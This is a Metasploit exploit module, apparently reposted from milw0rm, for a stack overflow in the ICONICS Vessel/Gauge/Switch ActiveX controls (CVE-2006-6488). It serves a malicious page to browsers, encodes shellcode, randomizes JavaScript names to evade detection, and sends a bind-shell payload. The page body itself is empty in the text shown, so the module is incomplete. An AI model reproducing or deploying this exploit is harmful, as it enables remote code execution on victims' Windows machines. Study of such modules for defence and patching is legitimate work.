##
# $Id: iconics_dlgwrapper.rb 1 2008-09-21 22:43:00Z kf $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
#
# $ msfcli exploit/windows/browser/iconics_dlgwrapper RHOST=10.211.55.6 PAYLOAD=windows/shell_bind_tcp E
require 'msf/core'
module Msf
class Exploits::Windows::Browser::Iconics_Dlgwrapper < Msf::Exploit::Remote
include Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'ICONICS Vessel / Gauge / Switch 8.02.140 ActiveX DoModal Overflow',
'Description' => %q{
This module exploits a stack overflow in the Iconics Vessel / Gauge / Switch ActiveX controls
},
'License' => MSF_LICENSE,
'Author' => [ 'tebo', 'kf' ],
'Version' => '$Revision: 2 $',
'References' =>
[
[ 'URL', 'http://www.kb.cert.org/vuls/id/251969' ],
[ 'URL', 'https://www.securityfocus.com/bid/21849/info' ],
[ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6488' ],
[ 'URL', 'http://www.iconics.com/support/free_tools/FreeToolsActiveX_DlgWrapperHotFix.zip' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
# This most likely works with Switch and Gauge ActiveX controls as well
# Thanks for the target testing tebo. Verified on 2kSP4, XPSP0, XPSP2, XPSP3
[ 'ICONICS Vessel ActiveX 8.02.140 - Universal EIP hit', { 'Payload' => { 'Space' => 412 } } ],
],
'DisclosureDate' => 'Jan 10 2007',
'DefaultTarget' => 0))
end
def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Randomize the javascript variable names
var_i = rand_text_alpha(rand(30) + 2)
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(rand(100) + 1)
rand5 = rand_text_alpha(rand(100) + 1)
rand6 = rand_text_alpha(rand(100) + 1)
rand7 = rand_text_alpha(rand(100) + 1)
rand8 = rand_text_alpha(rand(100) + 1)
rand9 = rand_text_alpha(rand(100) + 1)
rand10 = Rex::Text.to_unescape(rand_text_alpha(1), Rex::Arch.endian(target.arch))
idname = "DlgWrapper"
targetname = rand_text_alpha(rand(100) + 1)
content = %Q|
|
print_status("Note: The free ActiveX Controls (Gauge, Switch & Vessel) have a hotfix available.")
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
send_response_html(cli, content)
handler(cli)
end
end
end
# milw0rm.com [2008-09-25]